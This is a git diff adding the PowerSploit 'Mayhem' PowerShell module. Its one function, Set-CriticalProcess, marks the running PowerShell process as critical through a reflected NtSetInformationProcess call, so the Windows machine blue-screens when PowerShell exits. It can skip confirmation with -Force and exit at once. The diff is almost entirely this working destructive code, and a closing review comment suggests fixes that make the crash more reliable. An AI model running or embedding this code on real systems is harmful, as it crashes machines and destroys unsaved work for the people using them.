Diffstat (limited to 'Mayhem/Mayhem.psm1')
-rw-r--r--Mayhem/Mayhem.psm199
1 files changed, 99 insertions, 0 deletions
diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1
new file mode 100644
index 0000000..a8cd424
--- /dev/null
+++ b/Mayhem/Mayhem.psm1
@@ -0,0 +1,99 @@
+function Set-CriticalProcess
+{
+<#
+.SYNOPSIS
+
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.PARAMETER ExitImmediately
+
+Immediately exit PowerShell after successfully marking the process as critical.
+
+.PARAMETER Force
+
+Set the running PowerShell process as critical without asking for confirmation.
+
+.EXAMPLE
+
+Set-CriticalProcess
+
+.EXAMPLE
+
+Set-CriticalProcess -ExitImmediately
+
+.EXAMPLE
+
+Set-CriticalProcess -Force -Verbose
+
+#>
+
+ [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+ [Switch]
+ $Force,
+
+ [Switch]
+ $ExitImmediately
+ )
+
+ if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
+ {
+ throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
+ }
+
+ $Response = $True
+
+ if (!$Force)
+ {
+ $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
+ }
+
+ if (!$Response)
+ {
+ return
+ }
+
+ $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
+
+ # Define [ntdll]::NtQuerySystemInformation method
+ $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
+ 'ntdll.dll',
+ ([Reflection.MethodAttributes] 'Public, Static'),
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $ntdll = $TypeBuilder.CreateType()
+
+ $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
+ $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
+
+ $ProcessBreakOnTermination = 29
+ $SizeUInt32 = 4
+
+ try
+ {
+ $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
+ }
+ catch
+ {
+ return
+ }
+
+ Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
+
+ if ($ExitImmediately)
+ {
+ Stop-Process -Id $PID
+ }
+} \ No newline at end of file
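Review bot: The NTSTATUS from NtSetInformationProcess is thrown away (`$null = $ntdll::NtSetInformationProcess(...)`), so a failed call — reportedly the case when the caller's token does not hold an enabled SeDebugPrivilege, which ProcessBreakOnTermination is understood to require — still reaches the Write-Verbose claiming the process is critical and, with -ExitImmediately, the Stop-Process; the catch likewise returns silently. Capture and check the status: `$Status = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)` then `if ($Status -ne 0) { throw ('NtSetInformationProcess failed with NTSTATUS 0x{0:X8}' -f $Status) }`, and rethrow (or Write-Error) in the catch instead of `return`. Note also that what is passed as ProcessInformation is the IntPtr variable itself by reference, so the ULONG the kernel reads is the low 32 bits of the AllocHGlobal address — nonzero only by accident — while the 4-byte allocation is never written to or freed; declaring the parameter as `[UInt32].MakeByRefType()` and passing `[Ref] ([UInt32] 1)` would state the intent and drop the leak. The comment above DefinePInvokeMethod says `NtQuerySystemInformation` but the method defined is NtSetInformationProcess; suggest `# Define [ntdll]::NtSetInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength)`.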